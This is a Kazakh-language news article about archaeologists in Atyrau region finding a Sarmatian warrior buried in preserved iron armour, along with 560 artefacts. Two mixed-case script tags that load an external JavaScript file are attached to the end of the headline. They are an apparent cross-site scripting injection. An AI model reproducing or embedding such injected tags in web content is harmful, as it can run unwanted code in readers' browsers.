"Еуразияда да, Қазақстанда да тұңғыш кездесіп отырған жәдігер": Атырау облысында темір сауытты сармат батырының сүйегі табылды<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
09.10.2020
Қазақстан археологиясында ерекше жаңалық. Атырау облысында темір сауытты сармат батырының сүйегі табылды. Мұны ғалымдар елімізде бұрын - соңды табылған алтын адамдардан да құнды дейді. Өйткені сауыт-сайманы сол күйі сақталған бұл мүрде тарихтың талай сырын ашуы мүмкін. Бұл туралы
Тарихи құндылығын жоймай сақталған темір сауытты батыр сүйегін археологтар "темір адам" деп атапты. Бұл сарматтың ақ сүйегі, өйткені жерлеу рәсімі өзгеше, дейді археологтар. 2000 жылғы сүйек толық сақталған. Мүрденің жанында 1,5 метр семсері және ат әбзелдері бар. Тіпті, мәйітті жерлеу кезінде түтін түтеткен ожауына дейін сақталыпты. Сонымен қатар, алтын және күміс бұйымдары бар. Атырау облысы Қызылқоға ауданы Миялы ауылынан жәдігерді тапқан археолог Марат Қасенов бұл тарихымыз үшін баға жетпес байлық дейді. Қазба жұмыстары кезінде темір адамнан басқа күміс, қола, киіктас, қорғасын, әйнек және т.б. шикізаттардан жасалған 560 жәдігер табылған. Колбай Б.